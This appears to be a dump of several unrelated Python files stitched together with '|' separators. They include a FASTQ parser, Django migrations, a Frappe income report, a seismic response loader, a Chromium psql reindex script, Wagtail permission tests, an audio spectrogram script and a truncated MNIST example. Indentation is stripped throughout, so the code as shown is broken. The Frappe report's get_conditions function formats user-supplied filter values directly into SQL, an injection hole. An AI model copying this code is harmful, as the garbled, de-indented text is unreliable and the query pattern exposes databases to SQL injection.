print('*' * 100)
|
#!/usr/bin/env python3
def read_fastq(infile):
# reading one fastq-record at a time using a generator
name, seq, qual = None, None, None
while True:
line = infile.readline()
if not line:
break
name = line.rstrip()
line = infile.readline()
if not line:
break
seq = line.rstrip()
line = infile.readline()
if not line:
break
# qualname=infile.readline().rstrip()
line = infile.readline()
if not line:
break
qual = line.rstrip()
yield(name, seq, qual)
def read_fastq_paired_end(r1file, r2file):
while True:
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
name1 = line1.rstrip()
name2 = line2.rstrip()
# assert name1.split()[0] == name2.split()[0]
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
seq1 = line1.rstrip()
seq2 = line2.rstrip()
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
line1 = r1file.readline()
line2 = r2file.readline()
if not line1 or not line2:
break
qual1 = line1.rstrip()
qual2 = line2.rstrip()
yield(name1, seq1, qual1, name2, seq2, qual2)
|
# Generated by Django 3.1.7 on 2021-04-29 05:00
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('patient', '0003_auto_20210429_1259'),
]
operations = [
migrations.RenameField(
model_name='patientuser',
old_name='age',
new_name='birthday',
),
]
|
# Copyright (c) 2013, August Infotech and contributors
# For license information, please see license.txt
from __future__ import unicode_literals
import frappe
from frappe import msgprint, _, throw
def execute(filters=None):
if not filters: filters = {}
columns = get_columns(filters)
data = []
entries = get_income_data(filters)
if entries:
for entry in entries:
row = [ entry.income_category, entry.date_of_income, entry.amount]
data.append(row)
return columns, data
def get_columns(filters):
columns = []
columns.append(_("Income Category") + ":Link/Income Category:150")
columns.append(_("Date") + ":Date:100")
columns.append(_("Amount") + ":Currency:170")
return columns
def get_income_data(filters):
conditions, filters = get_conditions(filters)
expense_data = frappe.db.sql("Select * from `tabIncome` where docstatus < 2 %s order by date_of_income"% conditions, filters, as_dict=1)
if expense_data:
return expense_data
def get_conditions(filters):
conditions = ""
if filters.get("from_date"):
conditions += " and date_of_income >= '{0}' ".format(filters.get("from_date"))
if filters.get("to_date"):
conditions += " and date_of_income <= '{0}'".format(filters.get("to_date"))
if filters.get("income_category"):
conditions += " and income_category = '{0}'".format(filters.get("income_category"))
return conditions, filters
|
"""
This module contains all functions and classes for reading a response file and pushing it into the database
Functions and Classes
---------------------
"""
from nordb.database import sitechan2sql
from nordb.core import usernameUtilities
from nordb.database import creationInfo
RESPONSE_INSERT = (
"INSERT INTO response "
" (creation_id, file_name, source, stage, description, "
" format, author) "
"VALUES "
" (%s, %s, %s, %s, %s, %s, %s)"
"RETURNING id"
)
PAZ_RESPONSE_INSERT = (
"INSERT INTO paz_response "
" (response_id, scale_factor) "
"VALUES "
" (%s, %s) "
"RETURNING id"
)
POLE_INSERT = (
"INSERT INTO pole "
" (real, imag, real_error, imag_error, paz_id) "
"VALUES "
" (%s, %s, %s, %s, %s) "
)
ZERO_INSERT = (
"INSERT INTO zero "
" (real, imag, real_error, imag_error, paz_id) "
"VALUES "
" (%s, %s, %s, %s, %s) "
)
FAP_RESPONSE_INSERT = (
"INSERT INTO fap_response "
" (response_id) "
"VALUES "
" (%s) "
"RETURNING id"
)
FAP_INSERT = (
"INSERT INTO fap "
" (frequency, amplitude, phase, "
" amplitude_error, phase_error, fap_id) "
"VALUES "
" (%s, %s, %s, %s, %s, %s)"
)
def insertResponse2Database(response, privacy_level = "public"):
"""
Function for inserting the response object to the database
:param Response response: response that will be inserted to the database
"""
conn = usernameUtilities.log2nordb()
cur = conn.cursor()
c_id = creationInfo.createCreationInfo(privacy_level)
response.c_id = c_id
try:
cur.execute(RESPONSE_INSERT, response.getAsList())
response.response_id = cur.fetchone()[0]
if response.response_format == 'fap':
cur.execute(FAP_RESPONSE_INSERT, (response.response_id,))
fap_id = cur.fetchone()[0]
for fap in response.fap:
cur.execute(FAP_INSERT, fap + [fap_id])
elif response.response_format == 'paz':
cur.execute(PAZ_RESPONSE_INSERT, (response.response_id, response.scale_factor))
paz_id = cur.fetchone()[0]
for pole in response.poles:
cur.execute(POLE_INSERT, pole + [paz_id])
for zero in response.zeros:
cur.execute(ZERO_INSERT, zero + [paz_id])
else:
raise Exception("No such response format! ({0})".format(response.response_format))
except Exception as e:
conn.close()
raise e
conn.commit()
conn.close()
|
#!/usr/bin/python
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This is a small script designed to issue REINDEX TABLE commands to psql."""
import argparse
import os
import sys
# Import 'common.env' to load our Infra PYTHONPATH
sys.path.insert(0, os.path.join(
os.path.dirname(os.path.realpath(__file__)), os.pardir))
import common.env
common.env.Install()
from common import chromium_utils
def get_database_creds(dbconfig):
print 'reading dbconfig from %s' % dbconfig
values = {}
if os.path.isfile(dbconfig):
execfile(dbconfig, values)
if 'password' not in values:
raise Exception('could not get db password')
return values
def main():
parser = argparse.ArgumentParser(
description='Run a REINDEX TABLE command on postgres.')
parser.add_argument('directory',
help='location of the master to reindex.')
parser.add_argument('--dbconfig-filename', default='.dbconfig',
help='name of the dbconfig, defaults to %(default)s.')
parser.add_argument('--prod', action='store_true',
help='actually execute command instead of just displaying it.')
args = parser.parse_args()
filename = chromium_utils.AbsoluteCanonicalPath(os.path.join(
args.directory, args.dbconfig_filename))
dbconfig = get_database_creds(filename)
cmd = ['psql', '-h', 'localhost', '-U', dbconfig['username'],
'-d', dbconfig['dbname'], '-c',
'REINDEX TABLE buildrequests;']
new_env = os.environ.copy()
new_env['PGPASSWORD'] = dbconfig['password']
if args.prod:
return chromium_utils.RunCommand(cmd, env=new_env)
else:
print 'Would have run %s.' % cmd
print 'If this looks good, re-run with --prod.'
return 0
if __name__ == '__main__':
sys.exit(main())
|
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.models import ContentType
from django.test import TestCase
from django.urls import reverse
from wagtail.admin.admin_url_finder import AdminURLFinder
from wagtail.documents.models import Document
from wagtail.models import Collection, GroupCollectionPermission
from wagtail.test.utils import WagtailTestUtils
class CollectionInstanceTestUtils:
def setUp(self):
"""
Common setup for testing collection views with per-instance permissions
"""
collection_content_type = ContentType.objects.get_for_model(Collection)
self.add_permission = Permission.objects.get(
content_type=collection_content_type, codename="add_collection"
)
self.change_permission = Permission.objects.get(
content_type=collection_content_type, codename="change_collection"
)
self.delete_permission = Permission.objects.get(
content_type=collection_content_type, codename="delete_collection"
)
admin_permission = Permission.objects.get(codename="access_admin")
self.root_collection = Collection.get_first_root_node()
self.finance_collection = self.root_collection.add_child(name="Finance")
self.marketing_collection = self.root_collection.add_child(name="Marketing")
self.marketing_sub_collection = self.marketing_collection.add_child(
name="Digital Marketing"
)
self.marketing_sub_collection_2 = self.marketing_collection.add_child(
name="Direct Mail Marketing"
)
self.marketing_group = Group.objects.create(name="Marketing Group")
self.marketing_group.permissions.add(admin_permission)
self.marketing_user = self.create_user("marketing", password="password")
self.marketing_user.groups.add(self.marketing_group)
class TestCollectionsIndexViewAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:index"), params)
def test_simple(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/collections/index.html")
# Initially there should be no collections listed
# (Root should not be shown)
self.assertContains(response, "No collections have been created.")
root_collection = Collection.get_first_root_node()
self.collection = root_collection.add_child(name="Holiday snaps")
# Now the listing should contain our collection
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/collections/index.html")
self.assertNotContains(response, "No collections have been created.")
self.assertContains(response, "Holiday snaps")
def test_ordering(self):
root_collection = Collection.get_first_root_node()
root_collection.add_child(name="Milk")
root_collection.add_child(name="Bread")
root_collection.add_child(name="Avocado")
response = self.get()
# Note that the Collections have been automatically sorted by name.
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Avocado", "Bread", "Milk"],
)
def test_nested_ordering(self):
root_collection = Collection.get_first_root_node()
vegetables = root_collection.add_child(name="Vegetable")
vegetables.add_child(name="Spinach")
vegetables.add_child(name="Cucumber")
animals = root_collection.add_child(name="Animal")
animals.add_child(name="Dog")
animals.add_child(name="Cat")
response = self.get()
# Note that while we added the collections at level 1 in reverse-alpha order, they come back out in alpha order.
# And we added the Collections at level 2 in reverse-alpha order as well, but they were also alphabetized
# within their respective trees. This is the result of setting Collection.node_order_by = ['name'].
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Animal", "Cat", "Dog", "Vegetable", "Cucumber", "Spinach"],
)
class TestCollectionsIndexView(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
self.login(self.marketing_user, password="password")
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:index"), params)
def test_marketing_user_no_permissions(self):
response = self.get()
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_with_change_permission(self):
# Grant the marketing group permission to make changes to their collections
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.change_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertNotContains(response, "Finance")
self.assertNotContains(response, "Add a collection")
def test_marketing_user_with_add_permission(self):
# Grant the marketing group permission to add to their collections
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertNotContains(response, "Finance")
self.assertContains(response, "Add a collection")
def test_marketing_user_with_delete_permission(self):
# Grant the marketing group permission to add to their collections
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.delete_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertNotContains(response, "Finance")
self.assertNotContains(response, "Add a collection")
def test_marketing_user_with_add_permission_on_root(self):
# Grant the marketing group permission to add to root collection
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.root_collection,
permission=self.add_permission,
)
response = self.get()
self.assertEqual(response.status_code, 200)
# (Root should not be shown)
self.assertEqual(
[collection.name for collection in response.context["object_list"]],
["Finance", "Marketing", "Digital Marketing", "Direct Mail Marketing"],
)
self.assertContains(response, "Add a collection")
class TestAddCollectionAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
self.root_collection = Collection.get_first_root_node()
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:add"), params)
def post(self, post_data={}):
return self.client.post(reverse("wagtailadmin_collections:add"), post_data)
def test_get(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertContains(response, self.root_collection.name)
def test_post(self):
response = self.post(
{
"name": "Holiday snaps",
"parent": self.root_collection.id,
}
)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was created and is a child of root
self.assertEqual(Collection.objects.filter(name="Holiday snaps").count(), 1)
self.assertEqual(
Collection.objects.get(name="Holiday snaps").get_parent(),
self.root_collection,
)
class TestAddCollection(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
self.login(self.marketing_user, password="password")
def get(self, params={}):
return self.client.get(reverse("wagtailadmin_collections:add"), params)
def post(self, post_data={}):
return self.client.post(reverse("wagtailadmin_collections:add"), post_data)
def test_marketing_user_no_permissions(self):
response = self.get()
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_with_add_permission(self):
# Grant the marketing group permission to manage their collection
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
response = self.post(
{
"name": "Affiliate Marketing",
"parent": self.marketing_collection.id,
}
)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was created and is a child of Marketing
self.assertEqual(
Collection.objects.filter(name="Affiliate Marketing").count(), 1
)
self.assertEqual(
Collection.objects.get(name="Affiliate Marketing").get_parent(),
self.marketing_collection,
)
def test_marketing_user_cannot_add_outside_their_hierarchy(self):
# Grant the marketing group permission to manage their collection
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
# This user can't add to root collection
response = self.post(
{
"name": "Affiliate Marketing",
"parent": self.root_collection.id,
}
)
self.assertEqual(
response.context["form"].errors["parent"],
["Select a valid choice. That choice is not one of the available choices."],
)
class TestEditCollectionAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.user = self.login()
self.root_collection = Collection.get_first_root_node()
self.collection = self.root_collection.add_child(name="Holiday snaps")
self.l1 = self.root_collection.add_child(name="Level 1")
self.l2 = self.l1.add_child(name="Level 2")
self.l3 = self.l2.add_child(name="Level 3")
def get(self, params={}, collection_id=None):
return self.client.get(
reverse(
"wagtailadmin_collections:edit",
args=(collection_id or self.collection.id,),
),
params,
)
def post(self, post_data={}, collection_id=None):
return self.client.post(
reverse(
"wagtailadmin_collections:edit",
args=(collection_id or self.collection.id,),
),
post_data,
)
def test_get(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertContains(response, "Delete collection")
def test_cannot_edit_root_collection(self):
response = self.get(collection_id=self.root_collection.id)
self.assertEqual(response.status_code, 404)
def test_admin_url_finder(self):
expected_url = "/admin/collections/%d/" % self.l2.pk
url_finder = AdminURLFinder(self.user)
self.assertEqual(url_finder.get_edit_url(self.l2), expected_url)
def test_get_nonexistent_collection(self):
response = self.get(collection_id=100000)
self.assertEqual(response.status_code, 404)
def test_move_collection(self):
self.post({"name": "Level 2", "parent": self.root_collection.pk}, self.l2.pk)
self.assertEqual(
Collection.objects.get(pk=self.l2.pk).get_parent().pk,
self.root_collection.pk,
)
def test_cannot_move_parent_collection_to_descendant(self):
response = self.post({"name": "Level 2", "parent": self.l3.pk}, self.l2.pk)
self.assertEqual(
response.context["message"],
"The collection could not be saved due to errors.",
)
self.assertContains(response, "Please select another parent")
def test_rename_collection(self):
data = {"name": "Skiing photos", "parent": self.root_collection.id}
response = self.post(data, self.collection.pk)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was edited
self.assertEqual(
Collection.objects.get(id=self.collection.id).name, "Skiing photos"
)
class TestEditCollection(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
# Grant the marketing group permission to edit their collection
self.users_change_permission = GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.change_permission,
)
# Grant the marketing group permission to add collections under this collection
self.users_add_permission = GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.add_permission,
)
self.login(self.marketing_user, password="password")
def get(self, collection_id, params={}):
return self.client.get(
reverse("wagtailadmin_collections:edit", args=(collection_id,)), params
)
def post(self, collection_id, post_data={}):
return self.client.post(
reverse("wagtailadmin_collections:edit", args=(collection_id,)), post_data
)
def test_marketing_user_no_change_permission(self):
self.users_change_permission.delete()
response = self.get(collection_id=self.marketing_collection.id)
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_no_change_permission_post(self):
self.users_change_permission.delete()
response = self.post(self.marketing_collection.id, {})
self.assertEqual(response.status_code, 302)
self.assertEqual(
response.context["message"],
"Sorry, you do not have permission to access this area.",
)
def test_marketing_user_can_move_collection(self):
# Retrieve edit form and check fields
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
form_fields = response.context["form"].fields
self.assertEqual(type(form_fields["name"].widget).__name__, "TextInput")
self.assertEqual(
type(form_fields["parent"].widget).__name__, "SelectWithDisabledOptions"
)
# Now move the collection and check it did get moved and renamed
self.post(
self.marketing_sub_collection.pk,
{
"name": "New Collection Name",
"parent": self.marketing_sub_collection_2.pk,
},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_sub_collection.pk).name,
"New Collection Name",
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_sub_collection.pk).get_parent(),
self.marketing_sub_collection_2,
)
def test_marketing_user_cannot_move_collection_if_no_add_permission(self):
self.users_add_permission.delete()
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(list(response.context["form"].fields.keys()), ["name"])
# Now try to move the collection and check it did not get moved
def test_marketing_user_cannot_move_collection_if_no_add_permission_post(self):
self.users_add_permission.delete()
self.post(
self.marketing_sub_collection.pk,
{
"name": "New Collection Name",
"parent": self.marketing_sub_collection_2.pk,
},
)
edited_collection = Collection.objects.get(pk=self.marketing_sub_collection.id)
self.assertEqual(edited_collection.name, "New Collection Name")
self.assertEqual(edited_collection.get_parent(), self.marketing_collection)
def test_cannot_move_parent_collection_to_descendant(self):
self.post(
self.marketing_collection.pk,
{
"name": "New Collection Name",
"parent": self.marketing_sub_collection_2.pk,
},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_collection.pk).get_parent(),
self.root_collection,
)
def test_marketing_user_cannot_move_collection_permissions_are_assigned_to(self):
response = self.get(collection_id=self.marketing_collection.id)
self.assertEqual(response.status_code, 200)
self.assertEqual(list(response.context["form"].fields.keys()), ["name"])
self.assertNotContains(response, "Delete collection")
def test_marketing_user_cannot_move_collection_permissions_are_assigned_to_post(
self,
):
# Grant the marketing group permission to another collection so there is a valid destination
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.finance_collection,
permission=self.add_permission,
)
# We can move nodes lower on the tree
self.post(
self.marketing_sub_collection.id,
{"name": "Moved Sub", "parent": self.finance_collection.id},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_sub_collection.pk).get_parent(),
self.finance_collection,
)
# But we can't move the node to which our edit permission was assigned; update is ignored
self.post(
self.marketing_collection.id,
{
"name": self.marketing_collection.name,
"parent": self.finance_collection.id,
},
)
self.assertEqual(
Collection.objects.get(pk=self.marketing_collection.pk).get_parent(),
self.root_collection,
)
def test_page_shows_delete_link_only_if_delete_permitted(self):
# Retrieve edit form and check fields
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertNotContains(response, "Delete collection")
# Add delete permission to parent collection an try again
GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.delete_permission,
)
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertContains(response, "Delete collection")
class TestDeleteCollectionAsSuperuser(TestCase, WagtailTestUtils):
def setUp(self):
self.login()
self.root_collection = Collection.get_first_root_node()
self.collection = self.root_collection.add_child(name="Holiday snaps")
def get(self, params={}, collection_id=None):
return self.client.get(
reverse(
"wagtailadmin_collections:delete",
args=(collection_id or self.collection.id,),
),
params,
)
def post(self, post_data={}, collection_id=None):
return self.client.post(
reverse(
"wagtailadmin_collections:delete",
args=(collection_id or self.collection.id,),
),
post_data,
)
def test_get(self):
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/generic/confirm_delete.html")
def test_cannot_delete_root_collection(self):
response = self.get(collection_id=self.root_collection.id)
self.assertEqual(response.status_code, 404)
def test_get_nonexistent_collection(self):
response = self.get(collection_id=100000)
self.assertEqual(response.status_code, 404)
def test_get_nonempty_collection(self):
Document.objects.create(title="Test document", collection=self.collection)
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, "wagtailadmin/collections/delete_not_empty.html"
)
def test_get_collection_with_descendent(self):
self.collection.add_child(instance=Collection(name="Test collection"))
response = self.get()
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, "wagtailadmin/collections/delete_not_empty.html"
)
def test_post(self):
response = self.post()
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was deleted
with self.assertRaises(Collection.DoesNotExist):
Collection.objects.get(id=self.collection.id)
def test_post_nonempty_collection(self):
Document.objects.create(title="Test document", collection=self.collection)
response = self.post()
self.assertEqual(response.status_code, 403)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.collection.id))
def test_post_collection_with_descendant(self):
self.collection.add_child(instance=Collection(name="Test collection"))
response = self.post()
self.assertEqual(response.status_code, 403)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.collection.id))
def test_post_root_collection(self):
# first we have to clear out the root collection so it is empty
self.collection.delete()
response = self.post(collection_id=self.root_collection.id)
self.assertEqual(response.status_code, 404)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.root_collection.id))
class TestDeleteCollection(CollectionInstanceTestUtils, TestCase, WagtailTestUtils):
def setUp(self):
super().setUp()
# Grant the marketing group permission to delete
self.users_delete_permission = GroupCollectionPermission.objects.create(
group=self.marketing_group,
collection=self.marketing_collection,
permission=self.delete_permission,
)
self.login(self.marketing_user, password="password")
def get(self, collection_id, params={}):
return self.client.get(
reverse("wagtailadmin_collections:delete", args=(collection_id,)), params
)
def post(self, collection_id, post_data={}):
return self.client.post(
reverse("wagtailadmin_collections:delete", args=(collection_id,)), post_data
)
def test_get(self):
response = self.get(collection_id=self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(response, "wagtailadmin/generic/confirm_delete.html")
def test_post(self):
response = self.post(collection_id=self.marketing_sub_collection.id)
# Should redirect back to index
self.assertRedirects(response, reverse("wagtailadmin_collections:index"))
# Check that the collection was deleted
with self.assertRaises(Collection.DoesNotExist):
Collection.objects.get(id=self.marketing_sub_collection.id)
def test_cannot_delete_someone_elses_collection(self):
response = self.get(self.finance_collection.id)
self.assertEqual(response.status_code, 404)
def test_cannot_delete_someone_elses_collection_post(self):
response = self.post(self.finance_collection.id)
self.assertEqual(response.status_code, 404)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.marketing_sub_collection.id))
def test_cannot_delete_their_own_root_collection(self):
response = self.get(self.marketing_collection.id)
self.assertEqual(response.status_code, 404)
def test_cannot_delete_their_own_root_collection_post(self):
response = self.post(self.marketing_collection.id)
self.assertEqual(response.status_code, 404)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.marketing_collection.id))
def test_cannot_delete_collection_with_descendants(self):
self.marketing_sub_collection.add_child(
instance=Collection(name="Another collection")
)
response = self.get(self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 200)
self.assertTemplateUsed(
response, "wagtailadmin/collections/delete_not_empty.html"
)
def test_cannot_delete_collection_with_descendants_post(self):
self.marketing_sub_collection.add_child(
instance=Collection(name="Another collection")
)
response = self.post(self.marketing_sub_collection.id)
self.assertEqual(response.status_code, 403)
# Check that the collection was not deleted
self.assertTrue(Collection.objects.get(id=self.marketing_sub_collection.id))
|
# Copyright (C) 2007-2017, Raffaele Salmaso <[email protected]>
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import django.db.models.deletion
import django.utils.timezone
import fluo.db.models.fields
import model_history.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('contenttypes', '0002_remove_content_type_name'),
]
operations = [
migrations.CreateModel(
name='History',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', fluo.db.models.fields.CreationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='created')),
('last_modified_at', fluo.db.models.fields.ModificationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('app_label', models.CharField(max_length=100)),
('model', models.CharField(max_length=100)),
('source_id', models.PositiveIntegerField(verbose_name='source id')),
('source_type', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='contenttypes.ContentType', verbose_name='source content type')),
],
options={
'base_manager_name': 'objects',
'verbose_name_plural': 'Histories',
'ordering': ['-created_at'],
'verbose_name': 'History',
},
),
migrations.CreateModel(
name='HistoryRow',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_at', fluo.db.models.fields.CreationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='created')),
('last_modified_at', fluo.db.models.fields.ModificationDateTimeField(blank=True, default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('fields', model_history.fields.JSONField(default={}, verbose_name='fields')),
('updated', model_history.fields.JSONField(default={}, verbose_name='updated fields')),
('history', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='rows', to='model_history.History', verbose_name='history')),
],
options={
'base_manager_name': 'objects',
'verbose_name_plural': 'rows',
'ordering': ['-created_at'],
'verbose_name': 'row',
},
),
migrations.AlterUniqueTogether(
name='history',
unique_together=set([('app_label', 'model', 'source_id')]),
),
]
|
# -*- coding: utf-8 -*-
"""
Created on Wed Mar 2 08:22:48 2022
@author: xavier.mouy
"""
from ecosound.core.annotation import Annotation
from ecosound.core.metadata import DeploymentInfo
from ecosound.core.audiotools import Sound
import pandas as pd
from datetime import datetime
import os
import librosa
import librosa.display
import soundfile
import csv
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
def calc_spectro(y, sr, n_fft, hop_length, win_length, title="Power spectrogram"):
S = librosa.stft(y, n_fft=n_fft, hop_length=hop_length, win_length=win_length)
S = librosa.amplitude_to_db(S, ref=np.max)
fig, ax = plt.subplots()
img = librosa.display.specshow(
S, hop_length=hop_length, y_axis="linear", x_axis="time", sr=sr, ax=ax
)
# img = librosa.display.specshow(S, hop_length=hop_length,y_axis='linear', x_axis='time', sr=sr,ax=ax)
ax.set_title(title)
fig.colorbar(img, ax=ax, format="%+2.0f dB")
return fig, ax, S
params = dict()
params["dataset_file_path"] = r"C:\Users\xavier.mouy\Documents\GitHub\minke-whale-dataset\datasets\Annotations_dataset_MW-NN_20220204T192254.nc"
params["out_dir"] = r"C:\Users\xavier.mouy\Documents\GitHub\minke-whale-dataset\dataset_spectrograms"
params["audio_dir"] = r"C:\Users\xavier.mouy\Documents\GitHub\minke-whale-dataset\datasets"
params["sanpling_rate_hz"] = 2000
params["clips_buffer_s"] = 0
params["spectro_on"] = True
params["spetro_nfft"] = 512
params["spetro_frame"] = 512
params["spetro_inc"] = 128
params["spetro_on_npy"] = True
# Load dataset
dataset = Annotation()
dataset.from_netcdf(params["dataset_file_path"])
# define the different class names and create separate folders
outdirname = os.path.join(params["out_dir"],os.path.splitext(os.path.basename(params["dataset_file_path"]))[0])
if os.path.isdir(outdirname) == False:
os.mkdir(outdirname)
labels = list(set(dataset.data['label_class']))
# loop through each class_labels
for label in labels:
print(label)
current_dir = os.path.join(outdirname, label)
if os.path.isdir(current_dir) == False:
os.mkdir(current_dir)
annot_sp = dataset.data[dataset.data["label_class"] == label]
# loop through is annot for that class label
for idx, annot in annot_sp.iterrows():
F = str(annot.uuid) + '.png'
if os.path.isfile(os.path.join(current_dir, F)) == False: # only if file doesn't exist already
print('Processing file', F)
# define start/stop times +/- buffer
t1 = annot.time_min_offset - params["clips_buffer_s"]
if t1 <= 0:
t1 = 0
t2 = annot.time_max_offset + params["clips_buffer_s"]
duration = t2 - t1
# load sound clip
y, s = librosa.load(
os.path.join(annot["audio_file_dir"], annot["audio_file_name"])
+ annot["audio_file_extension"],
sr=params["sanpling_rate_hz"],
offset=t1,
duration=duration,
) # Downsample 44.1kHz to 8kHz
t2 = t1 + (len(y)/s) # readjust end time in case it exceeded the end of the file (which librosa handles by taking the last sample)
# Create audio clip standard name
#title = annot.deployment_ID + ' ' + annot.audio_file_name
title = annot.audio_file_name
# write spectrogram image
if params["spectro_on"]:
fig, ax, S = calc_spectro(
y,
s,
params["spetro_nfft"],
params["spetro_inc"],
win_length=params["spetro_frame"],
title = title
)
fig.savefig(os.path.join(current_dir, F), dpi=600)
plt.close("all")
plt.close()
plt.cla()
plt.clf()
#if params["spetro_on_npy"]:
# np.save(os.path.splitext(outfilename)[0] + ".npy", S)
#annot_unique_id += 1
|
"""A very simple MNIST classifier.
See extensive documentation at
http://tensorflow.org/tutorials/mnist/beginners/index.md
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import numpy as np
# assert tf.__version__ == "1.8.0"
tf.set_random_seed(20180130)
np.random.seed(20180130)
# Import data
from tensorflow.examples.tutorials.mnist import input_data
from datetime import datetime
import sys
import sys
sys.path.append("/data")
mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
start_time = datetime.now()
sess = tf.InteractiveSession()
# Create the model
x = tf.placeholder(tf.float32, [None, 784])
